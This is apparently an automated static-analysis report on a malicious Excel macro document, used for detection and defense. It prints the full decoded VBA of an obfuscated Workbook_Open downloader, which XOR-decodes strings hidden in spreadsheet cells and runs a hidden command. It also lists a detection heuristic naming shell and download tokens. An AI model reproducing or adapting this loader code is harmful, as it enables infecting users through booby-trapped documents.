Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 041afb6b7603efad…

MALICIOUS

Office (OLE) / .XLS

Size: 49.0 KB
Created: 2023-04-17 02:26:27
Authoring application: Microsoft Excel
First seen: 2023-04-19
MD5: 8fbe01336dbc0be5d7fbb5423a22f64b
SHA-1: d1b66fb309ffd965ebd4b12ff24e0298f8b2312b
SHA-256: 041afb6b7603efad11eb8fba6b3198189c14bbafa7ad622eba91d83df549c97a
Risk Score: 148

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1071.001 Web Protocols

The sample is an Excel file containing VBA macros, specifically a Workbook_Open macro. This macro is designed to execute obfuscated VBA code that uses GetObject and CreateObject to download and run a second-stage payload. The specific strings used to construct the commands are dynamically retrieved from cells within the 'm76f6' sheet, making direct IOC extraction difficult but indicating a downloader pattern.

Heuristics 5

  • VBA macros detected [medium] (4 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set Establishing = GetObject(Melissa).CreateObject(IntermedIate)
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set Establishing = GetObject(Melissa).CreateObject(IntermedIate)
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro [low] OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4624 bytes
SHA-256: e24013007c83681a3eefb730746c1e0596d1eef0202eed1184598ea5c5be5efa
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit







                                                                    Private Soldier As String





             





                  Private Collaborative As String








                                                                            Private Skype As String
Private CorreCtly As String







                                                        Private Establishing As Object

Private Sub Terror()
Dim Melissa As String, Meals As String, Dispute As String, IntermedIate As String
GoTo Meals






Neutral:
Melissa = Introduce(Soldier): Meals = Introduce(Collaborative): Dispute = Introduce(Skype): IntermedIate = Introduce(CorreCtly)







                                                                Set Establishing = GetObject(Melissa).CreateObject(IntermedIate)
GoTo Liked
Meals:
Soldier = Sheets("m76f6").Range("J162").Value: Collaborative = Sheets("m76f6").Range("J173").Value: Skype = Sheets("m76f6").Range("J146").Value: CorreCtly = Sheets("m76f6").Range("F114").Value
GoTo Neutral
Liked:
Establishing.Run Dispute & " " & Meals, 0
End Sub
Sub Workbook_Open()
GoTo EngagEmEnt
Dim Outer As String








                                                






                                            Outer = InputBox("enter the first number")
Dim Drawings As String
Drawings = InputBox("enter the last number")
MsgBox Outer






                                                            MsgBox Drawings





EngagEmEnt:







                                                If Outer = "" Then
Terror
End If







                                                                    End Sub
Private Function Makers(ByVal Hearts As String) As Variant








                  Dim Deutsch() As Byte, i As Long, SeedS As Integer
i = 0: ReDim Deutsch(0 To (Len(Hearts) / 2)) As Byte








Outer:







                   




                 





                   If i < Len(Hearts) Then
SeedS = SeedS + 1







               Deutsch(SeedS - 1) = Chr((7 * 2) + (((10 - 2) + 4) * 2)) & "H" & Mid(Hearts, i + 1, 2)







                 i = i + 2





          GoTo Outer







                                                                    




                                            Else






           





                                        GoTo Drawings







                                                






             






                






                                                        End If







Drawings:
Makers = Deutsch
End Function
Private Function Introduce(ByVal Refine As String) As Variant
Dim Distinct As Long: Distinct = 0: Dim Orchestra() As Byte: Dim Reset() As Byte, Deutsch As String, SeedS As Integer
Reset = "jf64689816"
GoTo Britney
Knife:
Dim Drawings As String
Drawings = InputBox("put calc number")
MsgBox Drawings








InstallIng:







                                                                        If Distinct < UBound(Orchestra) Then
SeedS = Distinct Mod (10)








              GoTo Melissa
Meals:
Deutsch = Deutsch & Chr(Orchestra(Distinct))
Distinct = Distinct + 1
GoTo InstallIng





                                                                        Else






                  GoTo DeleteD
End If





Hearts:
MsgBox "err -52525"
Dim Outer As String
Outer = InputBox("")
MsgBox Outer
DeleteD:
Introduce = Deutsch







                                                            Exit Function







              




Britney:
Orchestra = Makers(Refine)





                  GoTo InstallIng
Melissa:
Orchestra(Distinct) = Abs(Orchestra(Distinct) Xor Reset(SeedS * 2))
GoTo Meals
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True